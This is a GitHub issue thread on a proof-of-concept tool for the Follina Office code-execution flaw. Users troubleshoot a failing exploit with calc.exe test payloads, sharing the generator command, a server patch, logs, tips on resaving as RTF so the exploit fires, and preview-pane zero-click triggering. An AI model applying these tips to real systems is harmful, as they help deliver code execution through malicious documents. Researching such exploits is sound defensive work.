msdt-follina icon indicating copy to clipboard operation
msdt-follina copied to clipboard

Published 20 hours ago verified publisher icon JohnHammond

OPTIONS method unsupported?

Open steps0x29a opened this issue 2 years ago • 24 comments

First of all: thanks for your work, been a subscriber to your YouTube for quite some time now and highly enjoy it.

This is the reason why I immediately needed to try this one when I saw the repo. Sadly, it doesn't seem to work - at least not for my setup.

I can build the doc just fine and the server starts. When I then open the doc, I do see a lot of requests, but nothing seems to happen beyond that, i.e. the command (I tried several, including calc and notepad) is not executed.

What concerns me is that I get a lot of "unsupported method (OPTIONS)" log messages (see screenshot).

image

I am running this from a Windows 10 machine (also tried WSL Kali, same result) and opening the doc on Windows 10 as well.

Thought I'd leave this here in case you want to further improve your tool (or tell me that I did something wrong).

Thanks again. Hoping this will be helpful.

steps0x29a avatar May 31 '22 08:05 steps0x29a

HI, what Office Version do you use?

martinzeifang avatar May 31 '22 13:05 martinzeifang

Hey I got the same error. In my case I tested it in a VM with Word (Version 2205 Build 16.0.15225.20172) 64 Bit.

sevi-kun avatar May 31 '22 14:05 sevi-kun

Sorry, completely forgot to mention the version! Running Version 2205 (Build 15225.20204) 64 Bit

steps0x29a avatar May 31 '22 14:05 steps0x29a

I get the same error with Microsoft 365 Version 2205 (Build 15225.20204) 64 Bit. On Twitter I saw that not all Office 365 Versions are Vulnerable. I'm installing an Testsystem with an older Office Version right now.

martinzeifang avatar May 31 '22 14:05 martinzeifang

Is there a list of what versions are vulnerable/invulnerable?

supertsumu avatar May 31 '22 14:05 supertsumu

I couldn't find one yet. The POC Works with Office 2019 V1808 (Build 10730.20102)

martinzeifang avatar May 31 '22 14:05 martinzeifang

RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.

EDIT: I figured out my problem with the 0 click, the preview pane was disabled. At least on my clean Windows 10 21H2 Enterprise Edition this was the default.

nighttardis avatar May 31 '22 15:05 nighttardis

RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.

I tried python3 follina.py -c "calc.exe" -o "follina.rtf" -i <myip> but got the exact same result as above. How did you make it work?

steps0x29a avatar May 31 '22 15:05 steps0x29a

RTF version seems to be working fine on Version 2205 (Build 15225.20204) 64 Bit even though the doc version doesn't. Though I haven't been able to get the 0 click execution to happen.

I tried python3 follina.py -c "calc.exe" -o "follina.rtf" -i <myip> but got the exact same result as above. How did you make it work?

I had to open the doc that the script generated and save it as an rtf just changing the file extension didn't work.

nighttardis avatar May 31 '22 15:05 nighttardis

@nighttardis I tried to change the doc to rtf and didnt work for word versions 2205 and 2204, could you detail further how that goes?

davidcbbc avatar May 31 '22 16:05 davidcbbc

@davidcbbc assuming you had open the doc file with word and then resaved it as an RTF then I'm not sure why it would be working for me and not for you, as that is all I did. You don't have any AV stepping in causing you problems do you?

nighttardis avatar May 31 '22 16:05 nighttardis

Managed to get rid of the error by adding this method in the client handler class.

def do_OPTIONS(self):
    self.send_response(200, "ok")
    self.send_header('Access-Control-Allow-Origin', '*')
    self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
    self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
    self.send_header("Access-Control-Allow-Headers", "Content-Type")
    self.end_headers()

But this seems to not be the issue since calc still isn't popping up for me

vymvn avatar May 31 '22 16:05 vymvn

I also opened the file in word and saved as rtf and it worked. This was on 2205 15225.20204

Cyopeng avatar May 31 '22 16:05 Cyopeng

@nighttardis After changing to .rtf and opening, it gives me the following errors image image Does this happened to you?

davidcbbc avatar May 31 '22 16:05 davidcbbc

@davidcbbc What are you attempting with your exploit? Is this a nc shell, calculator, or notepad? I had this error appear but I did not have to click anything as the exploit works regardless.

Cyopeng avatar May 31 '22 17:05 Cyopeng

@Cyopeng Just a calculator for a simple PoC

davidcbbc avatar May 31 '22 17:05 davidcbbc

Edit: I'm replying to @davidcbbc

After manually opening the .doc, saving as .rtf, then opening again, I get the same pop-up (first one you posted). However Windows catches and blocks it (I'm trying to execute calc.exe): image

I'm using Office Professional Plus 2019 on Windows 10 Pro (build 19044.1706) Microsoft® Word 2019 MSO (Version 2205 Build 16.0.15225.20028) 32-bit

nickk avatar May 31 '22 17:05 nickk

When I convert the generated doc to an RTF (open in Word, then save as RTF), it at least triggers Windows Defender.

steps0x29a avatar Jun 01 '22 06:06 steps0x29a

@nickk That was indeed the problem. Defender prevented the execution

davidcbbc avatar Jun 01 '22 10:06 davidcbbc

Things are getting weird over here XD

I just did this: python3 follina.py -o tryagain.docx -i <myip> -c calc.exe and instead of not working at all, Defender caught it this time. Note the .docx file extension instead of .doc - this might be the difference that's making this work - I don't know. Just wanted to let you guys know.

steps0x29a avatar Jun 01 '22 19:06 steps0x29a

I also opened the file in word and saved as rtf and it worked. This was on 2205 15225.20204

+1 worked for me too.

vr-ct avatar Jun 01 '22 23:06 vr-ct

Didn't worked for me. Tried all mentioned options. Still getting "Message unsupported method" error. I'm also getting the "Connecting to the server for information" message duirng opening the file, and it stuck on this.

drucikpk avatar Jun 02 '22 10:06 drucikpk

@nighttardis After changing to .rtf and opening, it gives me an error message similar to what @davidcbbc posted, but I don't get the chance to click Yes. I was able to verify it was the same message by looking in the Event log.

Microsoft Word This document contains links that may refer to other files. Do you want to update this document with the data from the linked files? P1: 201214 P2: 16.0.15225.20204 P3: P4: 0x80070002

Microsoft Word The last time you opened 'f4.rtf', it caused a serious error. Do you still want to open it? P1: 700164 P2: 16.0.15225.20204

Microsoft Word Word couldn't start last time. Safe mode could help you troubleshoot the problem, but some features might not be available in this mode.

Do you want to start in safe mode? P1: 700159 P2: 16.0.15225.20204 P3: P4:

Microsoft® Word 2016 MSO (Version 2205 Build 16.0.15225.20172) 64-bit

shiftybit avatar Jun 02 '22 14:06 shiftybit

Same issue here:

Open follina.doc > Enable edit > Word closes > Errors below:

- - [29/Jul/2022 15:08:28] code 501, message Unsupported method ('OPTIONS')
- - [29/Jul/2022 15:08:28] "OPTIONS / HTTP/1.1" 501 -
- - [29/Jul/2022 15:08:28] "HEAD /index.html HTTP/1.1" 200 -
- - [29/Jul/2022 15:08:29] code 501, message Unsupported method ('OPTIONS')
- - [29/Jul/2022 15:08:29] "OPTIONS / HTTP/1.1" 501 -

I am running:

Microsoft Word 2016 MSO (16.0.4639.1000) 64 bits OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 Hotfix(s): 10 Hotfix(s) Installed. [01]: KB4601050 [02]: KB4562830 [03]: KB4570334 [04]: KB4577586 [05]: KB4580325 [06]: KB4586864 [07]: KB4589212 [08]: KB4598481 [09]: KB4601319 [10]: KB5005699

oflavioc avatar Jul 29 '22 18:07 oflavioc